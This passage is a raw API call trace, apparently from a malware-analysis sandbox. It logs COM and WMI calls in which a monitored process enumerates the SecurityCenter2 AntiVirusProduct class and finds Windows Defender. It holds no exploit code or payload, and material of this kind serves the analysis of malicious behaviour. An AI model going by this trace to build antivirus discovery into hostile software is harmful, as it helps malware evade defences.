(This=0x66fe70) returned 0x1 [0266.458] CoTaskMemFree (pv=0x54bc508) [0266.458] IUnknown:QueryInterface (in: This=0x663910, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x66fe70) returned 0x0 [0266.458] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ecc8 | out: ppvObject=0x19ecc8*=0x0) returned 0x80004002 [0266.458] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0266.459] IUnknown:QueryInterface (in: This=0x663910, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8bc | out: ppvObject=0x19e8bc*=0x0) returned 0x80004002 [0266.459] WbemLocator:IUnknown:AddRef (This=0x66fe70) returned 0x3 [0266.459] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e624 | out: ppvObject=0x19e624*=0x0) returned 0x80004002 [0266.459] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.459] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5e0 | out: ppvObject=0x19e5e0*=0x66fdcc) returned 0x0 [0266.459] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fdcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5e8 | out: pCid=0x19e5e8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.459] WbemLocator:IUnknown:Release (This=0x66fdcc) returned 0x3 [0266.459] CoGetContextToken (in: pToken=0x19e640 | out: pToken=0x19e640) returned 0x0 [0266.460] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0 [0266.460] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ead8 | out: ppvObject=0x19ead8*=0x66fe54) returned 0x0 [0266.460] WbemLocator:IRpcOptions:Query (in: This=0x66fe54, pPrx=0x66fe70, dwProperty=2, pdwValue=0x19eb00 | out: pdwValue=0x19eb00) returned 0x80004002 [0266.460] WbemLocator:IUnknown:Release (This=0x66fe54) returned 0x3 [0266.460] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x2 [0266.460] CoGetContextToken (in: pToken=0x19f020 | out: pToken=0x19f020) returned 0x0 [0266.460] CoGetContextToken (in: pToken=0x19ef80 | out: pToken=0x19ef80) returned 0x0 [0266.460] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x19f050*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f04c | out: ppvObject=0x19f04c*=0x663910) returned 0x0 [0266.460] IUnknown:AddRef (This=0x663910) returned 0x4 [0266.460] IUnknown:Release (This=0x663910) returned 0x3 [0266.463] IUnknown:Release (This=0x663910) returned 0x2 [0266.464] IUnknown:Release (This=0x663398) returned 0x2 [0266.464] SysStringLen (param_1=0x0) returned 0x0 [0266.464] IEnumWbemClassObject:Reset (This=0x663910) returned 0x0 [0266.464] CoTaskMemAlloc (cb=0x4) returned 0x54ba498 [0266.464] IEnumWbemClassObject:Next (in: This=0x663910, lTimeout=-1, uCount=0x1, apObjects=0x54ba498, puReturned=0x23ffc20 | out: apObjects=0x54ba498*=0x55397a8, puReturned=0x23ffc20*=0x1) returned 0x0 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e8d0 | out: ppvObject=0x19e8d0*=0x55397a8) returned 0x0 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e88c | out: ppvObject=0x19e88c*=0x0) returned 0x80004002 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e6ac | out: ppvObject=0x19e6ac*=0x0) returned 0x80004002 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e484 | out: ppvObject=0x19e484*=0x0) returned 0x80004002 [0266.466] IUnknown:AddRef (This=0x55397a8) returned 0x3 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e1ec | out: ppvObject=0x19e1ec*=0x0) returned 0x80004002 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e19c | out: ppvObject=0x19e19c*=0x0) returned 0x80004002 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e1a8 | out: ppvObject=0x19e1a8*=0x55397ac) returned 0x0 [0266.466] IMarshal:GetUnmarshalClass (in: This=0x55397ac, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e1b0 | out: pCid=0x19e1b0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0266.466] IUnknown:Release (This=0x55397ac) returned 0x3 [0266.466] CoGetContextToken (in: pToken=0x19e208 | out: pToken=0x19e208) returned 0x0 [0266.466] CoGetContextToken (in: pToken=0x19e610 | out: pToken=0x19e610) returned 0x0 [0266.466] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6a0 | out: ppvObject=0x19e6a0*=0x0) returned 0x80004002 [0266.467] IUnknown:Release (This=0x55397a8) returned 0x2 [0266.467] CoGetContextToken (in: pToken=0x19ebe0 | out: pToken=0x19ebe0) returned 0x0 [0266.467] CoGetContextToken (in: pToken=0x19eb40 | out: pToken=0x19eb40) returned 0x0 [0266.467] IUnknown:QueryInterface (in: This=0x55397a8, riid=0x19ec10*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ec0c | out: ppvObject=0x19ec0c*=0x55397a8) returned 0x0 [0266.467] IUnknown:AddRef (This=0x55397a8) returned 0x4 [0266.467] IUnknown:Release (This=0x55397a8) returned 0x3 [0266.467] IUnknown:Release (This=0x55397a8) returned 0x2 [0266.467] CoTaskMemFree (pv=0x54ba498) [0266.467] CoGetContextToken (in: pToken=0x19ef48 | out: pToken=0x19ef48) returned 0x0 [0266.467] IUnknown:AddRef (This=0x55397a8) returned 0x3 [0266.467] IWbemClassObject:Get (in: This=0x55397a8, wszName="__GENUS", lFlags=0, pVal=0x19f25c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f2dc*=0, plFlavor=0x19f2d8*=0 | out: pVal=0x19f25c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f2dc*=3, plFlavor=0x19f2d8*=64) returned 0x0 [0266.467] IWbemClassObject:Get (in: This=0x55397a8, wszName="__PATH", lFlags=0, pVal=0x19f240*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f2c4*=0, plFlavor=0x19f2c0*=0 | out: pVal=0x19f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiVirusProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"", varVal2=0x0), pType=0x19f2c4*=8, plFlavor=0x19f2c0*=64) returned 0x0 [0266.468] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiVirusProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xc8 [0266.468] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiVirusProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xc8 [0266.468] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f26c | out: ppv=0x19f26c*=0x601a94) returned 0x0 [0266.468] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f264 | out: pAptType=0x19f264*=1) returned 0x0 [0266.468] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f268 | out: ppvObject=0x19f268*=0x0) returned 0x80004002 [0266.468] IUnknown:Release (This=0x601a94) returned 0x1 [0266.469] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebd8 | out: ppv=0x19ebd8*=0x54ba548) returned 0x0 [0266.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19edf0 | out: ppvObject=0x19edf0*=0x0) returned 0x80004002 [0266.469] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba548, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee04 | out: ppvObject=0x19ee04*=0x55427b0) returned 0x0 [0266.469] WbemDefPath:IUnknown:Release (This=0x54ba548) returned 0x0 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea24 | out: ppvObject=0x19ea24*=0x55427b0) returned 0x0 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9e0 | out: ppvObject=0x19e9e0*=0x0) returned 0x80004002 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.470] WbemDefPath:IUnknown:AddRef (This=0x55427b0) returned 0x3 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e33c | out: ppvObject=0x19e33c*=0x0) returned 0x80004002 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e2ec | out: ppvObject=0x19e2ec*=0x0) returned 0x80004002 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2f8 | out: ppvObject=0x19e2f8*=0x5544d38) returned 0x0 [0266.470] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5544d38, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e300 | out: pCid=0x19e300*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.470] WbemDefPath:IUnknown:Release (This=0x5544d38) returned 0x3 [0266.470] CoGetContextToken (in: pToken=0x19e358 | out: pToken=0x19e358) returned 0x0 [0266.470] CoGetContextToken (in: pToken=0x19e760 | out: pToken=0x19e760) returned 0x0 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e7f0 | out: ppvObject=0x19e7f0*=0x0) returned 0x80004002 [0266.470] WbemDefPath:IUnknown:Release (This=0x55427b0) returned 0x2 [0266.470] WbemDefPath:IUnknown:Release (This=0x55427b0) returned 0x1 [0266.470] CoGetContextToken (in: pToken=0x19f0e8 | out: pToken=0x19f0e8) returned 0x0 [0266.470] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x55427b0, riid=0x19f118*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f114 | out: ppvObject=0x19f114*=0x55427b0) returned 0x0 [0266.471] WbemDefPath:IUnknown:AddRef (This=0x55427b0) returned 0x3 [0266.471] WbemDefPath:IUnknown:Release (This=0x55427b0) returned 0x2 [0266.471] WbemDefPath:IWbemPath:SetText (This=0x55427b0, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\SecurityCenter2:AntiVirusProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0x0 [0266.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542970, puCount=0x19f298 | out: puCount=0x19f298*=0x2) returned 0x0 [0266.471] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f294*=0x0, pszText=0x0 | out: puBuffLength=0x19f294*=0x19, pszText=0x0) returned 0x0 [0266.471] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f294*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f294*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542970, puCount=0x19f264 | out: puCount=0x19f264*=0x2) returned 0x0 [0266.471] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f260*=0x0, pszText=0x0 | out: puBuffLength=0x19f260*=0x19, pszText=0x0) returned 0x0 [0266.472] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f260*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f260*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.472] IWbemClassObject:Get (in: This=0x55397a8, wszName="displayName", lFlags=0, pVal=0x19f260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2400500*=0, plFlavor=0x2400504*=0 | out: pVal=0x19f260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x2400500*=8, plFlavor=0x2400504*=0) returned 0x0 [0266.472] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.472] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.472] IWbemClassObject:Get (in: This=0x55397a8, wszName="displayName", lFlags=0, pVal=0x19f268*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2400500*=8, plFlavor=0x2400504*=0 | out: pVal=0x19f268*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x2400500*=8, plFlavor=0x2400504*=0) returned 0x0 [0266.472] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.472] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.473] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542970, puCount=0x19f264 | out: puCount=0x19f264*=0x2) returned 0x0 [0266.473] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f260*=0x0, pszText=0x0 | out: puBuffLength=0x19f260*=0x19, pszText=0x0) returned 0x0 [0266.473] WbemDefPath:IWbemPath:GetText (in: This=0x5542970, lFlags=4, puBuffLength=0x19f260*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f260*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.473] IWbemClassObject:Get (in: This=0x55397a8, wszName="displayName", lFlags=0, pVal=0x19f260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2400610*=0, plFlavor=0x2400614*=0 | out: pVal=0x19f260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x2400610*=8, plFlavor=0x2400614*=0) returned 0x0 [0266.473] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.473] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.473] IWbemClassObject:Get (in: This=0x55397a8, wszName="displayName", lFlags=0, pVal=0x19f268*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2400610*=8, plFlavor=0x2400614*=0 | out: pVal=0x19f268*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x2400610*=8, plFlavor=0x2400614*=0) returned 0x0 [0266.473] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.473] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0266.473] CoTaskMemAlloc (cb=0x4) returned 0x54ba5a8 [0266.473] IEnumWbemClassObject:Next (in: This=0x663910, lTimeout=-1, uCount=0x1, apObjects=0x54ba5a8, puReturned=0x23ffc20 | out: apObjects=0x54ba5a8*=0x0, puReturned=0x23ffc20*=0x0) returned 0x1 [0266.474] CoTaskMemFree (pv=0x54ba5a8) [0266.474] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.474] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x1 [0266.474] IUnknown:Release (This=0x663910) returned 0x0 [0266.475] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.475] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0266.475] IUnknown:Release (This=0x663398) returned 0x0 [0266.476] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f288 | out: ppv=0x19f288*=0x601a94) returned 0x0 [0266.476] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f280 | out: pAptType=0x19f280*=1) returned 0x0 [0266.476] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x0) returned 0x80004002 [0266.476] IUnknown:Release (This=0x601a94) returned 0x1 [0266.477] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebf0 | out: ppv=0x19ebf0*=0x54ba458) returned 0x0 [0266.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba458, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ee08 | out: ppvObject=0x19ee08*=0x0) returned 0x80004002 [0266.477] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba458, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee1c | out: ppvObject=0x19ee1c*=0x55425f0) returned 0x0 [0266.478] WbemDefPath:IUnknown:Release (This=0x54ba458) returned 0x0 [0266.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x55425f0) returned 0x0 [0266.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9f8 | out: ppvObject=0x19e9f8*=0x0) returned 0x80004002 [0266.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5ec | out: ppvObject=0x19e5ec*=0x0) returned 0x80004002 [0266.478] WbemDefPath:IUnknown:AddRef (This=0x55425f0) returned 0x3 [0266.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e354 | out: ppvObject=0x19e354*=0x0) returned 0x80004002 [0266.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e304 | out: ppvObject=0x19e304*=0x0) returned 0x80004002 [0266.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e310 | out: ppvObject=0x19e310*=0x5544de0) returned 0x0 [0266.478] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5544de0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, 